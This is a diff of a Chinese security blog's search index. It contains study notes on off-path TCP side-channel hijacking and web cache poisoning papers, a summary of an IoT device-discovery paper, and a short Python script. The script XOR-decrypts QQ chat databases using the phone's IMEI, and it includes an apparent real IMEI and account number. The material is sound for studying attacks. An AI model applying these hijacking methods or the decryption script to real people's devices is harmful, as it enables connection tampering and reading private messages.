id="网络攻击"><a href="#网络攻击" class="headerlink" title="网络攻击"></a>网络攻击</h3><ol><li>中间人攻击<blockquote><p>“指攻击者与通讯的两端分别创建独立的联系，并交换其所收到的数据，使通讯的两端认为他们正在通过一个私密的连接与对方直接对话，但事实上整个会话都被攻击者完全控制。”</p></blockquote></li></ol><p><img src="./2-Man_in_the_middle_attack.svg.png" alt></p><ul><li>公共wifi、路由器劫持</li><li>一般使用加密来防御</li><li>加密的代价：维护密钥证书、影响功能（运营商无法做缓存）</li></ul><ol start="2"><li>非中间人攻击/偏离路径攻击/off-path attack<blockquote><p>通信线路之外，攻击者看不到双方的消息，没办法截获和发送通信包。智能伪造成一方给另一方发消息。</p></blockquote></li></ol><ul><li>攻击成功需要：消息合法+最先到达</li><li>防御措施：challenge-response/询问-应答机制<br>双方在通信前交换一个随机数，这个随机数在每次的通信中都要被附带，而中间人看不见这个随机数，因此伪造的消息被认为不合法。</li><li>攻击者如何得到这个随机数：侧信道</li></ul><hr><h3 id="TCP三次握手"><a href="#TCP三次握手" class="headerlink" title="TCP三次握手"></a>TCP三次握手</h3><p><img src="./3-Connection_TCP.png" alt></p><blockquote><ol><li>客户端通过向服务器端发送一个SYN来创建一个主动打开，作为三路握手的一部分。客户端把这段连接的序号设定为<em>随机数A</em>。</li><li>服务器端应当为一个合法的SYN回送一个SYN/ACK。ACK的确认码应为A+1，SYN/ACK包本身又有一个<em>随机产生的序号B</em>。</li><li>最后，客户端再发送一个ACK。当服务端收到这个ACK的时候，就完成了三路握手，并进入了连接创建状态。此时包的序号被设定为收到的确认号A+1，而响应号则为B+1。</li></ol></blockquote><p>通过三次握手，确定对方不是非中间人</p><p><strong><em>TCP序列号的问题</em></strong></p><table><thead><tr><th style="text-align:center">1985</th><th style="text-align:center">1995</th><th style="text-align:center">2001</th><th style="text-align:center">2004</th><th style="text-align:center">2007</th><th style="text-align:center">2012</th><th style="text-align:center">2012</th><th style="text-align:center">2016</th></tr></thead><tbody><tr><td style="text-align:center">Morris</td><td style="text-align:center">Mitnik</td><td style="text-align:center">Zalewsky</td><td style="text-align:center">Waston</td><td style="text-align:center">kLM</td><td style="text-align:center">Herzberg</td><td style="text-align:center">作者</td><td style="text-align:center">作者</td></tr><tr><td style="text-align:center">初始序列可预测</td><td style="text-align:center">真实利用</td><td style="text-align:center">漏洞仍在</td><td style="text-align:center">BGP DoS</td><td style="text-align:center">Windows攻击</td><td style="text-align:center">Puppet-assisted</td><td style="text-align:center">Malware-assisted</td><td style="text-align:center">off-path attack</td></tr></tbody></table><ol><li>90年代时发现并不随机：1995年伪造客户端连接微软大楼的服务器</li><li>2007年在windows场景下用IDID侧信道猜出序列号：只针对Windows，花费几小时</li></ol><hr><h2 id="Malware-assisted"><a href="#Malware-assisted" class="headerlink" title="Malware-assisted"></a>Malware-assisted</h2><p><strong>攻击模型：</strong><br>给受害者安装一个无特权的应用程序（仅能网络连接），这个程序跟非中间人的攻击者里应外合，劫持手机上所有的TCP连接。<br><img src="./5-攻击模型.PNG" alt></p><p><strong>如何劫持TCP</strong></p><ol><li><p>需要的信息：Facebook的连接IP地址和端口号，由此可以知道TCP连接的序列号，利用序列号伪装成Facebook给手机发消息。<br>使用netstat命令获取：<br><img src="./4-netstat获取信息.jpg" alt></p></li><li><p>任务：由于TCP的序列号通常连续，所以要精确猜到它的下一个序列号。</p></li><li>如何验证序列号正确：通过某种侧信道，这个恶意软件在后台可以提供反馈。</li></ol><h3 id="变种一：防火墙"><a href="#变种一：防火墙" class="headerlink" title="变种一：防火墙"></a>变种一：防火墙</h3><p><strong>攻击过程：</strong> TCP三次握手之后产生A和B，将来传输的包序列号必须跟A和B很接近，否则，防火墙会丢弃这个包。因此只有猜对了序列号，包才能到达手机端。到达手机端后，后台的恶意软件可以帮助我们判断手机是否接受了这个数据包。</p><p><strong>具体侧信道方案：</strong> CPU资源使用率（噪音很大）——&gt;TCP计数器（后台软件运行制造噪音）——&gt;低噪音计数器：包被丢掉时，一个相应的错误计数器。</p><p><strong>解决方法：</strong> 关闭防火墙检查序列号的功能</p><h3 id="变种二：无防火墙"><a href="#变种二：无防火墙" class="headerlink" title="变种二：无防火墙"></a>变种二：无防火墙</h3><p>具体侧信道方案：跟TCP业务逻辑有关的计数器——收到的TCP包序列号小于期望时增加，大于时不变。二分查找搜索正确的序列号。<br>影响范围：Android、Linux、MacOS、FreeBSD</p><hr><h2 id="Pure-off-path-无恶意软件协助"><a href="#Pure-off-path-无恶意软件协助" class="headerlink" title="Pure off-path:无恶意软件协助"></a>Pure off-path:无恶意软件协助</h2><blockquote><p>不植入恶意软件，劫持任意两台机器的TCP连接：首先确定是否建立TCP连接，然后推测其序列号A和B。</p></blockquote><h3 id="Global-Rate-Limit"><a href="#Global-Rate-Limit" class="headerlink" title="Global Rate Limit"></a>Global Rate Limit</h3><blockquote><p>USENIX 2016 : Off-Path TCP Exploits: Global Rate Limit Considered Dangerous</p></blockquote><p><strong>侧信道：</strong> 所有的侧信道，本质上就是攻击者和受害者之间共享着某些资源，如之前的全局TCP计数器。这里使用的侧信道是 <strong><em>服务器上</em></strong> 的共享资源，<strong><em>限速器</em></strong>（RFC 5961）限制某一种包的发送速率（默认100p/s）</p><p><strong>如何利用共享限速器：</strong><br>先判断是否建立了连接。然后伪造TCP包，需要猜测源端口，如果猜测正确，服务器会返回一个challenge，攻击者不断触发，一共可以收到99个（还有一个发给了客户端）；如果猜测错误，则一共可以收到100个challenge。</p><p><img src="./6-GRL-R.png" alt></p><p><img src="./7-GRL-L.png" alt></p><p><strong>评估：</strong> 是否建立了连接：&lt;10s  ;  Seq：30s  ； ACK:&lt;10s</p><p><strong>解决方案：</strong> 1. 加噪音，100变成150、200；2. 限速器做成局部的</p><hr><h3 id="Unfixable-WiFi-timing"><a href="#Unfixable-WiFi-timing" class="headerlink" title="Unfixable WiFi timing"></a>Unfixable WiFi timing</h3><blockquote><p>USENIX 2018 : Off-Path TCP Exploit: How Wireless Routers<br>Can Jeopardize Your Secrets<br>之前的漏洞无论是计数器还是限速器都属于软件，很好更正，但这篇文章的漏洞利用无法修复。</p></blockquote><p><strong>TCP收包的原理：</strong> 通常TCP收包要看这个包是否匹配了当前的某一个连接。如果连接匹配上了，就会去看这个包的序列号；如果序列号不对，会触发一个回复，说明这个序列号存在问题；如果序列号正确，但反向序列号不对，也会丢包。当连接匹配、序列号和反向序列号正确时，就会返回一个数据包。<br><img src="./8-收包原理.jpg" alt></p><p><strong>侧信道：</strong> 攻击者伪装成服务器给客户端发包，正确的序列号会有<strong><em>回复</em></strong>，错误则没有。但回复时发送给服务器的，有没有回复攻击者并不知道。那么如何去判断有没有回复，利用无线网络的  <strong><em>半双工</em></strong> 传输。<br>让有回包和没有回包的时间差异放大。</p><p><strong>判断流程：</strong> 客户端和路由器之间wifi通信。攻击者依次发送三个数据包，第一个包用来测试正常的RTT。第2个包是伪装成服务器发送的，如果第2个包猜对了，客户端会向服务器返回数据包，这会导致占用更长时间的wifi信道，从而会使第3个包的RTT更长。<br><img src="./8-noTrigger.PNG" alt></p><p><img src="./8-trigger.PNG" alt></p><p><strong>评估：</strong> 在本地环境下，如果发送40个包，就有20ms的RTT差别。</p><p><strong>攻击应用：</strong><br><strong>1. 攻击模型：</strong> 受害者访问了我们的钓鱼网站，这时javascript（傀儡）会在后台执行，主动建立到攻击者的连接（规避NAT或防火墙造成的不可抵达问题），这时攻击者就可以从外网测试RTT。</p><blockquote><p>与理想情况的不同：客户端通常在NAT或防火墙之后；操作系统不一定严格遵守TCP收包的原则</p></blockquote><pre><code>Attacker -------wire----------|                           Router ---------wireless-------Victim (client)Server   -------wire----------|</code></pre><p><strong>2. 攻击目标：</strong> 推断出客户端和服务器是否建立了连接；合计连接中交换的字节数或强制中断连接；注入恶意payload到连接（不失一般性的关注web缓存投毒）。前两个不需要傀儡初始化连接，第三个不一定需要，但攻击者控制了时序，能够简化攻击。</p><p><strong>3. 攻击过程：</strong> 假设傀儡已经建立了连接，攻击者可以劫持并替换任何不加密的网站（如武汉大学），并在浏览器缓存。这是因为当浏览器请求相同的ip地址时，会复用之前的TCP连接。这意味着恶意网站中的傀儡可以通过重复HTML元素来建立到目标域名的单个持久连接。然后，路径外攻击者可以进行侧信道攻击，以推断目标连接中使用的端口号和序列号，然后注入虚假的http响应，并要求浏览器不重新检查对象的新鲜度，从而达到持续性的缓存投毒。</p><p><strong>4. 细节：</strong></p><ul><li><strong>连接（四元组）推断：</strong> 每一轮使用30个重复包测试一个端口，如果端口号正确，就会发现RTT大幅增加。如果还要完成 <strong><em>web缓存投毒</em></strong>  ，还需要傀儡初始化连接来协助，根据系统不同，有不同的端口选择算法可以优化：<strong><em>windows&amp;macOS</em></strong> 使用全局和顺序端口分配策略为其TCP连接选择短暂的端口号，这意味着攻击者可以在观察到与恶意Web服务器的初始连接后推断出要使用的下一个端口号，这完全消除了对端口号推断的需要。<strong><em>NAT</em></strong> 端口保留，不需要关心外部端口被转换成不可预知的内部端口。<strong><em>来自同一域名的多个IP地址</em></strong>，这意味着攻击者需要付出更大的代价来推断端口号。</li><li><strong>序列号推断：</strong> 通过利用时序侧信道来判断是否存在相应的响应，从而将窗口序列号与窗外序列号区分开来。一旦我们得到一个 <strong><em>窗口内序列号</em></strong>，通过进行二分搜索进一步将序列号空间缩小到单个值  <strong><em>RCV.NXT</em></strong>。如果还要使用傀儡建立的连接发起web缓存投毒，可以进一步优化：<strong><em>增大接收窗口的大小</em></strong>，可以减少猜测的迭代次数，通常可以放大到500000(之前是65535)，而且根据RFC793,窗口放大之后就永远不会缩小。<br><img src="./9-序列号推断.PNG" alt></li><li><p><strong>TCP劫持：</strong> 通过劫持傀儡初始化的连接，可以简化web缓存投毒的过程。三个os在ACK验证上都不符合规范，所以各自处理情况也不同——<strong><em>windows</em></strong>：客户端必须持续发送请求以防止ACK接收窗口仅为一个字节，这要求攻击者必须能准确预期下一个序列号并解决大量流量带来的噪声。<br>因此，作者设计了一种新策略，该策略利用处理重叠数据的TCP行为和处理损坏的HTTP响应的浏览器行为——在Windows主机上缓冲的攻击者注入数据可能会破坏来自服务器的真实HTTP响应。 <strong><em>（1）注入</em></strong>，傀儡不断从服务器上请求脚本，而攻击者发送2^23/|wnd|个欺骗性数据包，这些包的窗口序列号与RCV.NXT加上偏移量相匹配，其中|wnd|为ack接收窗口大小，第i个数据包的ACK号为i*|wnd|，payload为</p>  <figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">websocket.send(|wnd|*i)</span><br></pre></td></tr></table></figure><p>  因此，这些数据包中包含有效ACK号的一个包将被缓冲，并破坏真实的HTTP响应头。浏览器执行注入的脚本时，它将通过websocket发送猜测的ACK号，提供有效的窗口内ACK号。<br><img src="./9-http注入.PNG" alt><br><strong><em>（2）利用</em></strong>，由于客户端已经接受了额外的欺骗payload，推进了其预期的序列号，因此客户端和服务器实际上已经被去同步。攻击者现在可以简单地发送欺骗性响应（知道预期的序列号和有效的ACK号）。如果我们只想执行一次性注入，只需用恶意脚本替换第一步中的payload就足够了。<br>此外，针对Windows的注入步骤存在更加通用的替代策略，不依赖于浏览器行为。 具体来说，由于HTTP响应的前几个字节是可预先确定的（即HTTP），不破坏真实的响应，而是覆盖标题和正文以形成合法但恶意的响应。 在这种情况下，浏览器将完全忘记注入的存在。 这表明一旦序列号泄露，就存在各种方法来有效地将数据注入浏览器，而不用进行基于时间信道的慢得多的ACK号推断。</p></li></ul><hr><h2 id="Discussion"><a href="#Discussion" class="headerlink" title="Discussion"></a>Discussion</h2><p>时序侧信道来自无线网络的半双工性质。由于无线协议中固有的冲突和回退，它被进一步放大。正如我们的测试路由器所证实的那样，现代无线路由器都支持CSMA / CA和RTS / CTS，因为它是802.11标准的一部分，并且该原则不太可能很快改变。<br>虽然作者只讨论威胁模型，其中来自受害客户端的连接是针对性的，但攻击实际上也适用于源自通过同一无线路由器连接的其他客户端的连接。这是因为所有这些客户端（例如，在相同NAT之后）共享了相同的冲突域并因此遭受相同的定时信道。通过探测数据包在任何客户端上触发的响应将有效地延迟探测后查询。在这种情况下，受害者连接（通过傀儡打开）只是为远程攻击者提供了测量碰撞的机会。<br>此外，我们可以扩展威胁模型以考虑无线连接的服务器，例如物联网设备。已经证明，通过公共IP地址和开放端口可以访问数百万个物联网设备。在这种情况下，可以针对此类IoT设备上的连接启动完全偏离路径的攻击。例如，计算在连接上交换的字节，终止与另一主机的连接，在正在进行的telnet连接上注入恶意命令。</p>]]></content>
-      
-      
+      <tags>
+        <tag>小米</tag>
+        <tag>文件格式</tag>
+        <tag>SSH</tag>
+      </tags>
+  </entry>
+  <entry>
+    <title><![CDATA[QQ数据库的加密与解密]]></title>
+    <url>%2F2019%2F02%2F22%2Fqq%E6%95%B0%E6%8D%AE%E5%BA%93%E7%9A%84%E5%8A%A0%E5%AF%86%E8%A7%A3%E5%AF%86%2F</url>
+    <content type="text"><![CDATA[qq数据库采用简单加密——异或加密数据获取：DENGTA_META.xml—IMEI:867179032952446databases/2685371834.db——数据库文件 解密方式：明文msg_t 密文msg_Data key：IMEImsg_t = msg_Data[i]^IMEI[i%15] 实验：123456789101112131415161718192021222324import sqlite3IMEI = &apos;867179032952446&apos;conn = sqlite3.connect(&apos;2685371834.db&apos;)c = conn.cursor()def _decrypt(foo): substr = &apos;&apos; #print(len(foo)) for i in range(0,len(foo)): substr += chr(ord(foo[i]) ^ ord(IMEI[i%15])) return substr#rem = c.execute(&quot;SELECT uin, remark, name FROM Friends&quot;)Msg = c.execute(&quot;SELECT msgData, senderuin, time FROM mr_friend_0FC9764CD248C8100C82A089152FB98B_New&quot;)for msg in Msg: uid = _decrypt(msg[1]) print(&quot;\n&quot;+uid+&quot;:&quot;) try: msgData = _decrypt(msg[0]).decode(&apos;utf-8&apos;) print(msgData) except: pass 结果]]></content>
       <categories>
-          
-          <category> 顶会论文 </category>
-          
+        <category>加密解密</category>
       </categories>
-      
-      
-        <tags>
-            
-            <tag> 侧信道攻击 </tag>
-            
-            <tag> wifi </tag>
-            
-        </tags>
-      
-    </entry>
-    
-    
-    
-    <entry>
-      <title>Acquisitional Rule-based Engine for Discovering Internet-of-Things Devices</title>
-      <link href="/2018/12/23/%E5%9F%BA%E4%BA%8E%E8%A7%84%E5%88%99%E5%BC%95%E6%93%8E%E5%8F%91%E7%8E%B0IOT%E8%AE%BE%E5%A4%87/"/>
-      <url>/2018/12/23/%E5%9F%BA%E4%BA%8E%E8%A7%84%E5%88%99%E5%BC%95%E6%93%8E%E5%8F%91%E7%8E%B0IOT%E8%AE%BE%E5%A4%87/</url>
-      
-        <content type="html"><![CDATA[<p><strong><em>论文来源：</em></strong>USENIX SECURITY 2018<br><strong><em>下载：</em></strong><br><a href="https://www.usenix.org/conference/usenixsecurity18/presentation/feng" target="_blank" rel="noopener">原文pdf</a><br><a href="https://res.cloudinary.com/dozyfkbg3/raw/upload/v1553314438/ARE/Rule-based_engine.pptx" target="_blank" rel="noopener">中文slides</a></p><h2 id="论文解读"><a href="#论文解读" class="headerlink" title="论文解读"></a>论文解读</h2><h3 id="1-概要："><a href="#1-概要：" class="headerlink" title="1.    概要："></a>1.    概要：</h3><ul><li>物联网（IoT）设备的快速增长的格局为其管理和安全性带来了重大的技术挑战，因为这些物联网设备来自不同的设备类型，供应商和产品模型。</li><li>物联网设备的发现是表征，监控和保护这些设备的先决条件。然而，手动设备注释阻碍了大规模发现，并且基于机器学习的设备分类需要具有标签的大型训练数据。因此，大规模的自动设备发现和注释仍然是物联网中的一个悬而未决的问题。</li><li>这篇文章提出了一种基于采集规则的引擎（ARE），它可以自动生成用于在没有任何训练数据的情况下发现和注释物联网设备的规则。ARE通过利用来自物联网设备的应用层响应数据和相关网站中的产品描述来构建设备规则，以进行设备注释。我们将事务定义为对产品描述的唯一响应之间的映射。</li><li>为了收集交易集，ARE提取响应数据中的相关术语作为抓取网站的搜索查询。ARE使用关联算法以（类型，供应商和产品）的形式生成物联网设备注释的规则。我们进行实验和三个应用程序来验证ARE的有效性。</li></ul><h3 id="2-背景与动机："><a href="#2-背景与动机：" class="headerlink" title="2.    背景与动机："></a>2.    背景与动机：</h3><ul><li>物联网蓬勃发展，造就了物联网设备的广泛应用，它不仅种类繁多，包括摄像头、打印机、路由器、电视盒子、工控系统、医疗设备等，而且数量庞大，据统计，每天就会新增5500000台物联网设备。</li><li>但是由于设备脆弱、缺乏管理和配置不当，物联网设备相比传统计算机要更不安全，比如之前爆发的Mirai僵尸网络，给美国造成了重大的损失。因此，为了更主动地保护IOT设备，提前发现、登记和注释物联网设备成为先决条件。</li><li>设备注释的内容通常为“设备类型(e.g.,routers) + 供应商(e.g.,CISCO) + 产品型号(e.g.,TV-IP302P)”，传统生成设备注释的方法有基于指纹的，也有使用标志获取的，前者对数据集和大量设备模型的要求很高，而后者需要专业知识的人工方式，因此不可能用于大规模注释而且很难去维护更新。</li></ul><p><img src="https://res.cloudinary.com/dozyfkbg3/image/upload/v1553313806/ARE/1.png" alt></p><p>所以，作者希望提出一种减少对数据集和人工依赖的注释方式。本文的方法主要基于两个事实，第一个Figure 1是制造商通常会将相关信息硬编码到IOT设备，第二个Figure 2是有许多网站（如产品测评）会描述设备产品。从第一个事实，我们可以从应用层数据包获取关键词，然后根据这些关键词依据第二个事实进行网页爬虫，以获取网页上的相关描述，然后对这些描述进行自然语言处理和数据挖掘，从而建立起基于规则的映射。</p><h3 id="3-核心工作—Rule-Miner："><a href="#3-核心工作—Rule-Miner：" class="headerlink" title="3.    核心工作—Rule Miner："></a>3.    核心工作—Rule Miner：</h3><p><img src="https://res.cloudinary.com/dozyfkbg3/image/upload/v1553313904/ARE/2.png" alt></p><p>  Rule Miner由三个部分构成，Transaction set是一对由应用层数据和相关网页组成的文本单元，它生成了一种规则： ，其中A是从应用层数据包中提取的一些特征，B是从相关网页抓取的设备描述；Device entity recognition结合了基于语料库的NER和基于规则的NER(命名实体识别)，前者解决了设备类型和供应商名，后者使用正则表达式识别出产品型号。但是由于一个不相干的网页也可能包含设备类型的关键词(如switch)，以及一个短语可能因为满足正则表达式而被认为是型号所以表现并不好，但好在实体与实体之间具有很高的依赖性，这三个元素常常一起出现。数据挖掘算法Apriori algorithm用于从Transaction中学习“关系”。</p><h3 id="4-完整架构和应用"><a href="#4-完整架构和应用" class="headerlink" title="4.    完整架构和应用"></a>4.    完整架构和应用</h3><p> <img src="https://res.cloudinary.com/dozyfkbg3/image/upload/v1553313904/ARE/4.png" alt></p><p>完整的ARE除了核心Rule Miner之外，还有Transaction Collection用于收集响应数据和网络爬虫，Rule Library用于存储生成的规则，Planner用于更新规则。<br>作者主要将ARE应用于三个方面，一是互联网范围的设备测量统计，二是对受损设备进行检测，三是对易受攻击的设备进行分析。<br><img src="https://res.cloudinary.com/dozyfkbg3/image/upload/v1553313946/ARE/6.png" alt><br>之后对ARE的效果与Nmap进行比较和评估，从产生规则的数量、规则的准确率和覆盖率、动态学习规则的能力以及时间代价，ARE都要优于Nmap。<br><img src="https://res.cloudinary.com/dozyfkbg3/image/upload/v1553313805/ARE/5.png" alt></p><h3 id="5-工作总结："><a href="#5-工作总结：" class="headerlink" title="5.    工作总结："></a>5.    工作总结：</h3><ul><li>提出ARE的框架：不需要数据集和人工干预，自动生成用于IOT设备识别的规则。</li><li>实现了ARE的原型并评估了它的效果：ARE在一周内生成了大量的规则，而且IOT设备识别的细粒度超过现有工具。</li><li>应用于三个场景中，主要发现有：大量IOT设备在互联网中可以抵达；成千上万的IOT设备易受攻击且暴露给了公众。</li></ul>]]></content>
-      
-      
+      <tags>
+        <tag>密码</tag>
+        <tag>QQ</tag>
+        <tag>数据库</tag>
+      </tags>
+  </entry>
+  <entry>
+    <title><![CDATA[wifi半双工侧信道攻击学习笔记]]></title>
+    <url>%2F2019%2F01%2F16%2Fwifi%E5%8D%8A%E5%8F%8C%E5%B7%A5%E4%BE%A7%E4%BF%A1%E9%81%93%E6%94%BB%E5%87%BB%E5%AD%A6%E4%B9%A0%E7%AC%94%E8%AE%B0%2F</url>
+    <content type="text"><![CDATA[TCP侧信道分析及利用的学习报告背景知识测信道香农信息论 什么是信息？ 用来减少随机不确定的东西 什么是加密？ 类似于加噪声，增加随机不确定性 “从密码分析者来看，一个保密系统几乎就是一个通信系统。待传的消息是统计事件，加密所用的密钥按概率选出，加密结果为密报，这是分析者可以利用的，类似于受扰信号。” 侧信道随之出现 越过加密算法增加的随机不定性，从其他的渠道获取数据标签，确定信息内容。 早期：采集加密电子设备在运行过程中的时间消耗、功率消耗或者电磁辐射消耗等边缘信息的差异性 而随着研究的深入，逐渐从加密设备延伸到计算机内部CPU、内存等之间的信息传递 并在Web应用交互信息传递越来越频繁时，延伸到了网络加密数据流的破解方面 侧信道攻击的流程 第一个就是侧信道泄露的截取，第二个是信息的恢复。 网络攻击 中间人攻击 “指攻击者与通讯的两端分别创建独立的联系，并交换其所收到的数据，使通讯的两端认为他们正在通过一个私密的连接与对方直接对话，但事实上整个会话都被攻击者完全控制。” 公共wifi、路由器劫持 一般使用加密来防御 加密的代价：维护密钥证书、影响功能（运营商无法做缓存） 非中间人攻击/偏离路径攻击/off-path attack 通信线路之外，攻击者看不到双方的消息，没办法截获和发送通信包。智能伪造成一方给另一方发消息。 攻击成功需要：消息合法+最先到达 防御措施：challenge-response/询问-应答机制双方在通信前交换一个随机数，这个随机数在每次的通信中都要被附带，而中间人看不见这个随机数，因此伪造的消息被认为不合法。 攻击者如何得到这个随机数：侧信道 TCP三次握手 客户端通过向服务器端发送一个SYN来创建一个主动打开，作为三路握手的一部分。客户端把这段连接的序号设定为随机数A。 服务器端应当为一个合法的SYN回送一个SYN/ACK。ACK的确认码应为A+1，SYN/ACK包本身又有一个随机产生的序号B。 最后，客户端再发送一个ACK。当服务端收到这个ACK的时候，就完成了三路握手，并进入了连接创建状态。此时包的序号被设定为收到的确认号A+1，而响应号则为B+1。 通过三次握手，确定对方不是非中间人 TCP序列号的问题 1985 1995 2001 2004 2007 2012 2012 2016 Morris Mitnik Zalewsky Waston kLM Herzberg 作者 作者 初始序列可预测 真实利用 漏洞仍在 BGP DoS Windows攻击 Puppet-assisted Malware-assisted off-path attack 90年代时发现并不随机：1995年伪造客户端连接微软大楼的服务器 2007年在windows场景下用IDID侧信道猜出序列号：只针对Windows，花费几小时 Malware-assisted攻击模型：给受害者安装一个无特权的应用程序（仅能网络连接），这个程序跟非中间人的攻击者里应外合，劫持手机上所有的TCP连接。 如何劫持TCP 需要的信息：Facebook的连接IP地址和端口号，由此可以知道TCP连接的序列号，利用序列号伪装成Facebook给手机发消息。使用netstat命令获取： 任务：由于TCP的序列号通常连续，所以要精确猜到它的下一个序列号。 如何验证序列号正确：通过某种侧信道，这个恶意软件在后台可以提供反馈。 变种一：防火墙攻击过程： TCP三次握手之后产生A和B，将来传输的包序列号必须跟A和B很接近，否则，防火墙会丢弃这个包。因此只有猜对了序列号，包才能到达手机端。到达手机端后，后台的恶意软件可以帮助我们判断手机是否接受了这个数据包。 具体侧信道方案： CPU资源使用率（噪音很大）——&gt;TCP计数器（后台软件运行制造噪音）——&gt;低噪音计数器：包被丢掉时，一个相应的错误计数器。 解决方法： 关闭防火墙检查序列号的功能 变种二：无防火墙具体侧信道方案：跟TCP业务逻辑有关的计数器——收到的TCP包序列号小于期望时增加，大于时不变。二分查找搜索正确的序列号。影响范围：Android、Linux、MacOS、FreeBSD Pure off-path:无恶意软件协助 不植入恶意软件，劫持任意两台机器的TCP连接：首先确定是否建立TCP连接，然后推测其序列号A和B。 Global Rate Limit USENIX 2016 : Off-Path TCP Exploits: Global Rate Limit Considered Dangerous 侧信道： 所有的侧信道，本质上就是攻击者和受害者之间共享着某些资源，如之前的全局TCP计数器。这里使用的侧信道是 服务器上 的共享资源，限速器（RFC 5961）限制某一种包的发送速率（默认100p/s） 如何利用共享限速器：先判断是否建立了连接。然后伪造TCP包，需要猜测源端口，如果猜测正确，服务器会返回一个challenge，攻击者不断触发，一共可以收到99个（还有一个发给了客户端）；如果猜测错误，则一共可以收到100个challenge。 评估： 是否建立了连接：&lt;10s ; Seq：30s ； ACK:&lt;10s 解决方案： 1. 加噪音，100变成150、200；2. 限速器做成局部的 Unfixable WiFi timing USENIX 2018 : Off-Path TCP Exploit: How Wireless RoutersCan Jeopardize Your Secrets之前的漏洞无论是计数器还是限速器都属于软件，很好更正，但这篇文章的漏洞利用无法修复。 TCP收包的原理： 通常TCP收包要看这个包是否匹配了当前的某一个连接。如果连接匹配上了，就会去看这个包的序列号；如果序列号不对，会触发一个回复，说明这个序列号存在问题；如果序列号正确，但反向序列号不对，也会丢包。当连接匹配、序列号和反向序列号正确时，就会返回一个数据包。 侧信道： 攻击者伪装成服务器给客户端发包，正确的序列号会有回复，错误则没有。但回复时发送给服务器的，有没有回复攻击者并不知道。那么如何去判断有没有回复，利用无线网络的 半双工 传输。让有回包和没有回包的时间差异放大。 判断流程： 客户端和路由器之间wifi通信。攻击者依次发送三个数据包，第一个包用来测试正常的RTT。第2个包是伪装成服务器发送的，如果第2个包猜对了，客户端会向服务器返回数据包，这会导致占用更长时间的wifi信道，从而会使第3个包的RTT更长。 评估： 在本地环境下，如果发送40个包，就有20ms的RTT差别。 攻击应用：1. 攻击模型： 受害者访问了我们的钓鱼网站，这时javascript（傀儡）会在后台执行，主动建立到攻击者的连接（规避NAT或防火墙造成的不可抵达问题），这时攻击者就可以从外网测试RTT。 与理想情况的不同：客户端通常在NAT或防火墙之后；操作系统不一定严格遵守TCP收包的原则 Attacker -------wire----------| Router ---------wireless-------Victim (client) Server -------wire----------| 2. 攻击目标： 推断出客户端和服务器是否建立了连接；合计连接中交换的字节数或强制中断连接；注入恶意payload到连接（不失一般性的关注web缓存投毒）。前两个不需要傀儡初始化连接，第三个不一定需要，但攻击者控制了时序，能够简化攻击。 3. 攻击过程： 假设傀儡已经建立了连接，攻击者可以劫持并替换任何不加密的网站（如武汉大学），并在浏览器缓存。这是因为当浏览器请求相同的ip地址时，会复用之前的TCP连接。这意味着恶意网站中的傀儡可以通过重复HTML元素来建立到目标域名的单个持久连接。然后，路径外攻击者可以进行侧信道攻击，以推断目标连接中使用的端口号和序列号，然后注入虚假的http响应，并要求浏览器不重新检查对象的新鲜度，从而达到持续性的缓存投毒。 4. 细节： 连接（四元组）推断： 每一轮使用30个重复包测试一个端口，如果端口号正确，就会发现RTT大幅增加。如果还要完成 web缓存投毒 ，还需要傀儡初始化连接来协助，根据系统不同，有不同的端口选择算法可以优化：windows&amp;macOS 使用全局和顺序端口分配策略为其TCP连接选择短暂的端口号，这意味着攻击者可以在观察到与恶意Web服务器的初始连接后推断出要使用的下一个端口号，这完全消除了对端口号推断的需要。NAT 端口保留，不需要关心外部端口被转换成不可预知的内部端口。来自同一域名的多个IP地址，这意味着攻击者需要付出更大的代价来推断端口号。 序列号推断： 通过利用时序侧信道来判断是否存在相应的响应，从而将窗口序列号与窗外序列号区分开来。一旦我们得到一个 窗口内序列号，通过进行二分搜索进一步将序列号空间缩小到单个值 RCV.NXT。如果还要使用傀儡建立的连接发起web缓存投毒，可以进一步优化：增大接收窗口的大小，可以减少猜测的迭代次数，通常可以放大到500000(之前是65535)，而且根据RFC793,窗口放大之后就永远不会缩小。 TCP劫持： 通过劫持傀儡初始化的连接，可以简化web缓存投毒的过程。三个os在ACK验证上都不符合规范，所以各自处理情况也不同——windows：客户端必须持续发送请求以防止ACK接收窗口仅为一个字节，这要求攻击者必须能准确预期下一个序列号并解决大量流量带来的噪声。因此，作者设计了一种新策略，该策略利用处理重叠数据的TCP行为和处理损坏的HTTP响应的浏览器行为——在Windows主机上缓冲的攻击者注入数据可能会破坏来自服务器的真实HTTP响应。 （1）注入，傀儡不断从服务器上请求脚本，而攻击者发送2^23/|wnd|个欺骗性数据包，这些包的窗口序列号与RCV.NXT加上偏移量相匹配，其中|wnd|为ack接收窗口大小，第i个数据包的ACK号为i*|wnd|，payload为 1websocket.send(|wnd|*i) 因此，这些数据包中包含有效ACK号的一个包将被缓冲，并破坏真实的HTTP响应头。浏览器执行注入的脚本时，它将通过websocket发送猜测的ACK号，提供有效的窗口内ACK号。（2）利用，由于客户端已经接受了额外的欺骗payload，推进了其预期的序列号，因此客户端和服务器实际上已经被去同步。攻击者现在可以简单地发送欺骗性响应（知道预期的序列号和有效的ACK号）。如果我们只想执行一次性注入，只需用恶意脚本替换第一步中的payload就足够了。此外，针对Windows的注入步骤存在更加通用的替代策略，不依赖于浏览器行为。 具体来说，由于HTTP响应的前几个字节是可预先确定的（即HTTP），不破坏真实的响应，而是覆盖标题和正文以形成合法但恶意的响应。 在这种情况下，浏览器将完全忘记注入的存在。 这表明一旦序列号泄露，就存在各种方法来有效地将数据注入浏览器，而不用进行基于时间信道的慢得多的ACK号推断。 Discussion时序侧信道来自无线网络的半双工性质。由于无线协议中固有的冲突和回退，它被进一步放大。正如我们的测试路由器所证实的那样，现代无线路由器都支持CSMA / CA和RTS / 